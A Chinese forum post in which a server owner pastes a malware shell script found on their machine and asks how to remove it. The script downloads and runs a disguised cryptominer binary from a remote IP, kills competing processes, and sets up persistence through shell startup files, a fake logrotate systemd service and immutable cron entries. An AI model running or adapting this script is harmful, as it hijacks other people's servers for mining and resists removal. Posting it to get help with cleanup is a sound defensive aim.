首页 > 其他分享 >服务器中病毒了,哪位安全方面的大神来给看看,急!急!急!

服务器中病毒了,哪位安全方面的大神来给看看,急!急!急!

时间:2024-07-03 12:41:28浏览次数:24  
标签:etc 大神 dev cron 哪位 logrotate && 服务器 null

这是一段病毒脚本,哪位大神给解读下,要怎么清理掉它呢?

现在是文件删不掉,进程杀不掉

#!/bin/sh
{ pkill -f xmrig || kill -9 $(pgrep -f 'xmrig'); } >/dev/null 2>&1
ps -eo pid,%cpu,comm --sort=-%cpu | awk 'NR>1 && !/awk|ps/ && !($3 ~ /^(logrotate|sshd|java)$/) && int($2) > 60 { system("kill -9 " $1) }'
EXEC="source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)"
trap 'rm -- "$0"' EXIT
if [ -z "${HOME+x}" ]; then
   export HOME=/tmp
fi
mkdir -p "$HOME/.config" >/dev/null 2>&1
[ ! -f "$HOME/.config/logrotate" ] && { 
   ARCH=$(uname -m)
   URL=""
   [ "$ARCH" = "x86_64" ] && URL="http://185.196.8.123/silicon64blueprints.png"
   [ "$ARCH" = "aarch64" ] && URL="http://185.196.8.123/siliconarmblueprints.png"
   [ -z "$URL" ] && URL="http://185.196.8.123/silicon64blueprints.png"
   { wget -q -O "$HOME/.config/logrotate" "$URL" || curl -sL -o "$HOME/.config/logrotate" "$URL"; } >/dev/null 2>&1
   chmod +x "$HOME/.config/logrotate" >/dev/null 2>&1
}
pgrep -f "config/logrotate" >/dev/null 2>&1 || "$HOME/.config/logrotate"
add_to_startup() {
   if [ -r "$1" ]; then
       if ! grep -Fxq "$EXEC >/dev/null 2>&1" "$1"; then
           echo "$EXEC >/dev/null 2>&1" >> "$1"
       fi
   fi
}
case "$(ps -p $$ -o comm=)" in
   bash) add_to_startup "$HOME/.bashrc"
         add_to_startup "$HOME/.bash_logout" ;;
   zsh) add_to_startup "$HOME/.zshrc" ;;
esac
[ "$(id -u)" -eq 0 ] && {
   RCLOCAL=''
   [ -e /etc/debian_version ] && RCLOCAL='/etc/rc.local'
   [ -e /etc/centos-release -o -e /etc/redhat-release ] && RCLOCAL='/etc/rc.d/rc.local'
   [ -n "$RCLOCAL" ] && add_to_startup "$RCLOCAL"
   cat >/etc/systemd/system/logrotate.service <<EOL
[Unit]
Description=The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files
[Service]
ExecStart=$HOME/.config/logrotate
Restart=always
Nice=-20
StandardOutput=null
[Install]
WantedBy=multi-user.target
EOL
   sudo systemctl daemon-reload 2>/dev/null
   sudo systemctl enable logrotate.service 2>/dev/null
   [ -d /var/spool/cron ] && [ -f /var/spool/cron/root ] && echo "@daily $EXEC" >> /var/spool/cron/root 2>/dev/null
   [ -d /var/spool/cron/crontabs ] && [ -f /var/spool/cron/crontabs/root ] && echo "@daily $EXEC" >> /var/spool/cron/crontabs/root 2>/dev/null
   [ -f /etc/crontab ] && echo "@daily $EXEC" >> /etc/crontab 2>/dev/null && sudo chattr +i /etc/crontab 2>/dev/null
   [ -d /etc/cron.hourly ] && echo "$EXEC" >> /etc/cron.hourly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.hourly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.hourly/logrotate 2>/dev/null
   [ -d /etc/cron.daily ] && echo "$EXEC" >> /etc/cron.daily/logrotate 2>/dev/null && sudo chmod +x /etc/cron.daily/logrotate 2>/dev/null && sudo chattr +i /etc/cron.daily/logrotate 2>/dev/null
   [ -d /etc/cron.weekly ] && echo "$EXEC" >> /etc/cron.weekly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.weekly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.weekly/logrotate 2>/dev/null
   [ -d /etc/cron.monthly ] && echo "$EXEC" >> /etc/cron.monthly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.monthly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.monthly/logrotate 2>/dev/null
   [ -d /etc/cron.yearly ] && echo "$EXEC" >> /etc/cron.yearly/logrotate 2>/dev/null && sudo chmod +x /etc/cron.yearly/logrotate 2>/dev/null && sudo chattr +i /etc/cron.yearly/logrotate 2>/dev/null
}

 

标签:etc,大神,dev,cron,哪位,logrotate,&&,服务器,null
From: https://www.cnblogs.com/aligege/p/18281397

相关文章

  • Ubuntu24.04配置支持asp.net framework 4.0的apache服务器
    参考《在Linux(Ubuntu/openSUSE/CentOS)下配置ASP.NET(Apache+Mono)》,但由于操作系统版本不一样,部分命令要修改1、安装apachesudoapt-getinstallapache22、安装mono及apache支持模块,这里安装很正常,并没有文中提到的卡死情况,应该是已经修复这个bug了。sudoaptinstallmon......
  • 在华为云服务器上通过宝塔面板部署Node.js项目的完整流程
    引言        个人想体验一下完整的项目部署上线过程,因此设计了一个后台管理系统,后端采用nodejs实现,前端基于Vue3和TS,主要部署的流程如下(既然是流程,那就一步步来,当初自己部署的时候看别人记录,有些地方突然就理所当然了......大佬们可能觉得我们都会)。    于是......
  • web登陆注册页面留言框-连接服务器
    一.成品展图二.前端代码 1.注册regist.html<!DOCTYPEhtml><html><head> <metacharset="utf-8"><title>注册</title><metacharset="utf-6"><linkrel="stylesheet"type="text/css"hr......
  • 博客建站2 - 选择网站服务器
    1.本网站的系统架构2.是否需要购买服务器3.如何选择服务器3.1.确定需求3.2.云服务提供商3.2.1.国内与海外3.2.2.国内的服务器供应商3.3.服务器类型3.3.1.共享主机3.3.2.虚拟私有服务器(VPS)3.3.3.云服务器3.3.4.个人建议3.4.服务器位置3.5.选择操作系统3.6......
  • 使用nodejs ws模块连接websocket服务器Unexpected response code: 403错误解决
    使用浏览器连接websocket服务器时一切正常,但是使用nodejs ws模块连接时一直报Unexpectedresponsecode:403错误,查了很多帖子都没说明白,最后自己试着一点一点对比模拟浏览器请求头,最终解决问题,解决后代码如下://TODO不加这个,会报403错误constoptions={headers:{......
  • 服务器上怎么部署docker
    在服务器上部署Docker主要涉及以下几个步骤,这里以UbuntuLinux为例,其他操作系统的步骤略有不同:在Ubuntu上部署Docker的步骤:1.安装Docker更新包索引:sudoaptupdate安装依赖包,以允许apt使用HTTPS访问Docker仓库:sudoaptinstall-yapt-transport-h......
  • IBM X3650 服务器数据恢复
    故障服务器数据恢复环境:一台IBMX3650M4服务器,共有8块SAS硬盘,组成raid5磁盘阵列。故障服务器数据恢复环境:服务器在运行过程中有2块硬盘报警,系统无法启动,服务器上层运行的2003系统ORACLE数据库无法启动。服务器数据恢复过程1.将服务器硬盘全部取出,对每块硬盘进行检测,均无发......
  • 服务器RAID数据丢失恢复
    故障服务器数据恢复环境:一台存储,服务器底层共有6块硬盘组成raid5阵列,1TB的SAS硬盘。操作系统是WINDOWS2003SERVER。服务器数据恢复故障检测分析:在正常工作状态下由于机房电压问题连续遭遇了两次意外断电。将服务器进行重启,但raid阵列提示“无法找到存储设备”。服务器数据......
  • 网络安全:网站服务器建立数据库连接时出错的解决办法…[通俗易懂]
    大家好,又见面了。PONY在这里教给大家2个简单处理办法,大神就不用看了,太简单浪费时间哈哈很多新手使用wordpress程序建站初期,会遇到页面提示:建立数据库连接出错,英文提示:“Errorestablishingadatabaseconnection”。那么遇到这种情况大家会很头疼,我到底哪里操作不对呀?本文中老......
  • 虚拟化服务器数据恢复
    服务器数据恢复环境:机房突然断电导致整个存储瘫痪,加电后存储依然无法使用。故障存储,共有10块硬盘(4TSAS硬盘)组成的RAID-6磁盘阵列,整个卷中存放了大量的Windows虚拟机。故障服务器检测分析:将故障存储的所有磁盘和备份sss数据的目标磁盘连入到一台WindowsServer2008的服务器......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99